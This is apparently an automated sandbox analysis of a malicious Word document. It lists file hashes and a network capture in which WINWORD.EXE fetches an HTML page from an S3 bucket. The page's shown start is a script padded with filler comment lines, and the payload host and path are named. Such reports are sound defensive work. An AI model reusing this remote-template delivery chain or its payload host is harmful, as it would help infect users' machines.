                                                                                                                                                                  SHA256:05625644a2e070d4780822daf7126f408ec0db9881a9995dc24ee500b624a198
                                                                                                                                                                  SHA512:882c74e579e8aa9cc9fff1eb29c9f01a7a8c85fbff836676f79eedf1fbd5eedce1872977935e68faa59dc3049095b40f19b06e43717bead435a0e22c070cc962
                                                                                                                                                                  SSDEEP:192:CtIWmk402hTZ3S7Ok0lyCpLpYBV7PuNrxnpApwzxux:aIWmkIhTZC789YBY9Vzxux
                                                                                                                                                                  TLSH:BB32BF37CE46E822C641C87871D942EFF32C4797A715CBDB414E52C6149738A23BEE29
                                                                                                                                                                  File Content Preview:PK..........!....lZ... .......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                  File Icon

                                                                                                                                                                  Icon Hash:74fcd0d2d6d6d0cc

                                                                                                                                                                  Network Behavior

                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                  TCP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Aug 18, 2022 02:01:55.171631098 CEST49746443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.171685934 CEST4434974652.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.171771049 CEST49746443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.173043966 CEST49746443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.173069000 CEST4434974652.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.284960985 CEST4434974652.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.285151958 CEST49746443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.287527084 CEST49746443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.287554979 CEST4434974652.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.287811041 CEST4434974652.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.289504051 CEST49746443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.326055050 CEST4434974652.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.330045938 CEST4434974652.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.330157042 CEST49746443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.334287882 CEST49746443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.334317923 CEST4434974652.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.391673088 CEST49747443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.391730070 CEST4434974752.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.391828060 CEST49747443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.392059088 CEST49747443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.392071009 CEST4434974752.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.503655910 CEST4434974752.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.505837917 CEST49747443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.505868912 CEST4434974752.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.507261038 CEST49747443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.507277966 CEST4434974752.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.545725107 CEST4434974752.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.545805931 CEST4434974752.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.545881987 CEST49747443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.552083015 CEST49747443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.552114010 CEST4434974752.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.552128077 CEST49747443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.552134991 CEST4434974752.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.629345894 CEST49748443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:58.629399061 CEST4434974852.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.629481077 CEST49748443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:58.629786015 CEST49748443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:58.629798889 CEST4434974852.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.763305902 CEST4434974852.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.764017105 CEST49748443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:58.764045954 CEST4434974852.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.765404940 CEST49748443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:58.765419960 CEST4434974852.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.804188967 CEST4434974852.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.804595947 CEST49748443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:58.908571005 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:58.908622026 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.908720016 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:58.909761906 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:58.909789085 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.026542902 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.026638031 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.036384106 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.036415100 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.036796093 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.036865950 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.037455082 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.079376936 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.114492893 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.114577055 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.114608049 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.114625931 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.114639997 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.114658117 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.114696026 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.117564917 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.117599010 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.294574022 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.294631004 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.294743061 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.295038939 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.295054913 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.406631947 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.406847000 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.407361984 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.407377958 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.410166025 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.410183907 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.448570013 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.448667049 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.448692083 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.448714972 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.448807955 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.448816061 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.449383974 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.449398041 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.449408054 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.449448109 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.623143911 CEST49751443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.623199940 CEST4434975152.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.623264074 CEST49751443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.623554945 CEST49751443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.623568058 CEST4434975152.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.727024078 CEST4434975152.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.727139950 CEST49751443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.738238096 CEST49751443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.738255024 CEST4434975152.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.740786076 CEST49751443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.740802050 CEST4434975152.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.777492046 CEST4434975152.95.143.42192.168.2.3

                                                                                                                                                                  UDP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Aug 18, 2022 02:01:55.141829967 CEST5238753192.168.2.38.8.8.8
                                                                                                                                                                  Aug 18, 2022 02:01:55.163202047 CEST53523878.8.8.8192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.890090942 CEST6062553192.168.2.38.8.8.8
                                                                                                                                                                  Aug 18, 2022 02:01:58.906965971 CEST53606258.8.8.8192.168.2.3

                                                                                                                                                                  DNS Queries

                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                  Aug 18, 2022 02:01:55.141829967 CEST192.168.2.38.8.8.80x2a30Standard query (0)sqdocs.s3.eu-west-2.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                  Aug 18, 2022 02:01:58.890090942 CEST192.168.2.38.8.8.80x22d7Standard query (0)sqdocs.s3.eu-west-2.amazonaws.comA (IP address)IN (0x0001)

                                                                                                                                                                  DNS Answers

                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                  Aug 18, 2022 02:01:55.163202047 CEST8.8.8.8192.168.2.30x2a30No error (0)sqdocs.s3.eu-west-2.amazonaws.coms3-r-w.eu-west-2.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                  Aug 18, 2022 02:01:55.163202047 CEST8.8.8.8192.168.2.30x2a30No error (0)s3-r-w.eu-west-2.amazonaws.com52.95.148.198A (IP address)IN (0x0001)
                                                                                                                                                                  Aug 18, 2022 02:01:58.906965971 CEST8.8.8.8192.168.2.30x22d7No error (0)sqdocs.s3.eu-west-2.amazonaws.coms3-r-w.eu-west-2.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                  Aug 18, 2022 02:01:58.906965971 CEST8.8.8.8192.168.2.30x22d7No error (0)s3-r-w.eu-west-2.amazonaws.com52.95.143.42A (IP address)IN (0x0001)

                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                  • sqdocs.s3.eu-west-2.amazonaws.com

                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  0192.168.2.34974652.95.148.198443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:01:55 UTC0OUTOPTIONS / HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Authorization: Bearer
                                                                                                                                                                  User-Agent: Microsoft Office Word 2014
                                                                                                                                                                  X-Office-Major-Version: 16
                                                                                                                                                                  X-MS-CookieUri-Requested: t
                                                                                                                                                                  X-FeatureVersion: 1
                                                                                                                                                                  X-MSGETWEBURL: t
                                                                                                                                                                  X-IDCRL_ACCEPTED: t
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  2022-08-18 00:01:55 UTC0INHTTP/1.1 400 Bad Request
                                                                                                                                                                  x-amz-request-id: 5QCKAXC7DG7KWCEQ
                                                                                                                                                                  x-amz-id-2: ZmvR6seVEacXD3bHCJcCVNc24scqdKcionnSYgtdPuKR55sTeEnQFN39kbcGKOSJtT8Px8zchS0=
                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:01:54 GMT
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2022-08-18 00:01:55 UTC0INData Raw: 31 31 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 35 51 43 4b 41 58 43 37 44 47 37 4b 57 43 45 51 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 5a 6d 76 52 36 73 65 56 45 61 63 58 44 33 62 48 43 4a 63 43 56 4e 63 32 34 73 63 71 64 4b 63 69 6f 6e 6e 53 59 67 74 64 50 75 4b 52 35 35 73 54 65 45 6e 51 46 4e 33 39 6b 62 63 47
                                                                                                                                                                  Data Ascii: 11b<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>5QCKAXC7DG7KWCEQ</RequestId><HostId>ZmvR6seVEacXD3bHCJcCVNc24scqdKcionnSYgtdPuKR55sTeEnQFN39kbcG
                                                                                                                                                                  2022-08-18 00:01:55 UTC0INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  1192.168.2.34974752.95.148.198443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:01:55 UTC0OUTHEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Authorization: Bearer
                                                                                                                                                                  User-Agent: Microsoft Office Word 2014
                                                                                                                                                                  X-Office-Major-Version: 16
                                                                                                                                                                  X-MS-CookieUri-Requested: t
                                                                                                                                                                  X-FeatureVersion: 1
                                                                                                                                                                  X-IDCRL_ACCEPTED: t
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  2022-08-18 00:01:55 UTC1INHTTP/1.1 400 Bad Request
                                                                                                                                                                  x-amz-request-id: 5QCM3ZBPJHNQ6B31
                                                                                                                                                                  x-amz-id-2: wtiPXNw4psoYP4KoBz6ow5DVioPCQ46oSnVxP60MDdTYuSqybn84v0cj+Si6gaOPMWJ9xiZxuVg=
                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:01:54 GMT
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  10192.168.2.34975652.95.143.42443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:02:00 UTC13OUTHEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
                                                                                                                                                                  Authorization: Bearer
                                                                                                                                                                  X-MS-CookieUri-Requested: t
                                                                                                                                                                  X-IDCRL_ACCEPTED: t
                                                                                                                                                                  User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2022-08-18 00:02:00 UTC14INHTTP/1.1 400 Bad Request
                                                                                                                                                                  x-amz-request-id: TT1GGMJ3NHTMGSNX
                                                                                                                                                                  x-amz-id-2: PEKOO5iCwgLvYsjguB+ANO/Z+QSv0crGg59ZOj0Ckf4T62fGrzdprUXMazqepsOk6BkvbbLCUGU=
                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:02:00 GMT
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  11192.168.2.34975752.95.143.42443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:02:01 UTC14OUTHEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
                                                                                                                                                                  Authorization: Bearer
                                                                                                                                                                  X-MS-CookieUri-Requested: t
                                                                                                                                                                  X-IDCRL_ACCEPTED: t
                                                                                                                                                                  User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2022-08-18 00:02:01 UTC14INHTTP/1.1 400 Bad Request
                                                                                                                                                                  x-amz-request-id: ZEV4D8MZA5ZJ1FHD
                                                                                                                                                                  x-amz-id-2: RSj/NtHjlgcSHIRWyNZtlYtZa9qD5+TMgLl6wB82hV9HgTFE60ogFpZtMa9Q1lC2QmFuvh3mJ58=
                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:02:00 GMT
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  12192.168.2.34975852.95.143.42443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:02:06 UTC14OUTHEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
                                                                                                                                                                  Authorization: Bearer
                                                                                                                                                                  X-MS-CookieUri-Requested: t
                                                                                                                                                                  X-IDCRL_ACCEPTED: t
                                                                                                                                                                  User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2022-08-18 00:02:06 UTC15INHTTP/1.1 400 Bad Request
                                                                                                                                                                  x-amz-request-id: E80VWEB1AMKYZNWY
                                                                                                                                                                  x-amz-id-2: 0BWYhlFey3+aAE1qOD1AP1Q71QTNRlWpvY+uCIz3wJAD9HRMzfwi90X1DnI3V9df0Rdee1ttGrU=
                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:02:06 GMT
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  2192.168.2.34974852.95.148.198443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:01:58 UTC1OUTOPTIONS / HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Authorization: Bearer
                                                                                                                                                                  User-Agent: Microsoft Office Word 2014
                                                                                                                                                                  X-Office-Major-Version: 16
                                                                                                                                                                  X-MS-CookieUri-Requested: t
                                                                                                                                                                  X-FeatureVersion: 1
                                                                                                                                                                  X-MSGETWEBURL: t
                                                                                                                                                                  X-IDCRL_ACCEPTED: t
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  2022-08-18 00:01:58 UTC1INHTTP/1.1 400 Bad Request
                                                                                                                                                                  x-amz-request-id: P3EWWM72G2RM0XJE
                                                                                                                                                                  x-amz-id-2: FSmMv6eeU+h8DR13qzhvThGDOugjSr6g4c5sbuke10CmSf9fNRwf0Ox1ENuctW3LSoV71PkJaoU=
                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:01:58 GMT
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2022-08-18 00:01:58 UTC1INData Raw: 31 31 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 50 33 45 57 57 4d 37 32 47 32 52 4d 30 58 4a 45 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 46 53 6d 4d 76 36 65 65 55 2b 68 38 44 52 31 33 71 7a 68 76 54 68 47 44 4f 75 67 6a 53 72 36 67 34 63 35 73 62 75 6b 65 31 30 43 6d 53 66 39 66 4e 52 77 66 30 4f 78 31 45 4e 75 63
                                                                                                                                                                  Data Ascii: 11b<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>P3EWWM72G2RM0XJE</RequestId><HostId>FSmMv6eeU+h8DR13qzhvThGDOugjSr6g4c5sbuke10CmSf9fNRwf0Ox1ENuc
                                                                                                                                                                  2022-08-18 00:01:58 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  3192.168.2.34974952.95.143.42443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:01:59 UTC2OUTGET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2022-08-18 00:01:59 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                  x-amz-id-2: oIIlUHss3ir8tXxf8vsNAqhVGr5rfrX6iPExtJuwA/pkcrBb+WlpUvSUT6k/tMAZT0eW6cU8uWE=
                                                                                                                                                                  x-amz-request-id: DVY02PZCBKMPRJGM
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:02:00 GMT
                                                                                                                                                                  Last-Modified: Sat, 28 May 2022 14:15:08 GMT
                                                                                                                                                                  ETag: "bfbfa8fdda62476690c9077946372eaa"
                                                                                                                                                                  x-amz-meta-sha256: a353db4cfd64f1876f3f99be6481189dbf5e770d71b8d03cba84ff551edbcdc6
                                                                                                                                                                  x-amz-meta-s3b-last-modified: 20220528T141455Z
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Content-Length: 6837
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2022-08-18 00:01:59 UTC3INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                  Data Ascii: <!doctype html><html lang="en"><body><script>//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  4192.168.2.34975052.95.143.42443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  2022-08-18 00:01:59 UTC9OUTHEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
                                                                                                                                                                  Authorization: Bearer
                                                                                                                                                                  X-MS-CookieUri-Requested: t
                                                                                                                                                                  X-IDCRL_ACCEPTED: t
                                                                                                                                                                  User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                  Host: sqdocs.s3.eu-west-2.amazonaws.com
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2022-08-18 00:01:59 UTC9INHTTP/1.1 400 Bad Request
                                                                                                                                                                  x-amz-request-id: DVYEP8YWXYYRJGDD
                                                                                                                                                                  x-amz-id-2: VYJt91aw1V3E4W8U3qXrpbSZrLUVLylL13dvNUN38v+OEh8jOUOwsHzvv27P4K+dKntcKUMoaSI=
                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                  Date: Thu, 18 Aug 2022 00:01:58 GMT
                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  5192.168.2.34975152.95.143.42443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
